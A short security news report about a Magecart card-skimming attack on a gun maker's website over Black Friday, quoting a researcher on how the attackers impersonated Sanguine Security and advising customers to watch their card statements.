The website of a leading American gun manufacturer was compromised by threat actors on Black Friday.
When the script is loaded a fake payment form is displayed, to which if a customer enters their payment information and submits it, the payment information is sent to a remote server that is under the control of threat actors.
The threat actors can then log into their server and retrieve the payment information.
De Groot explained that the Magecart group has been utilising the Sanguine Security name to legitimise the campaign, and using his name as the domain contact.
“Skimming code & infrastructure is identical to the campaign that impersonates Sanguine Security,” said de Groot. “Hacker registered skimming domains in my name and disguises as Sanguine protection.”
It can be assumed that threat actors purposely chose Sanguine Security, as majority of its work for customers is to help protect them from Magecart attacks.
Magecart attacks can have serious financial repercussions, with the last major skimming case against Macy’s wiping $500m off its stock value: “Alas, for Smith & Wesson, the put options don’t seem to be in high demand right now. Carding has a better yield than stock manipulation?”
Customers who recently entered their payment information on the website are urged to contact their credit card company and monitor their statements for any suspicious charges.
Join our free-to-attend digital event, Last Thursday in Privacy, addressing data protection, privacy and security challenges including working from home, COVID-19, global regulations and more. Visit https://digital.privsec.info/.
We have been awarded the number 1 GDPR Blog in 2019 by Feedspot.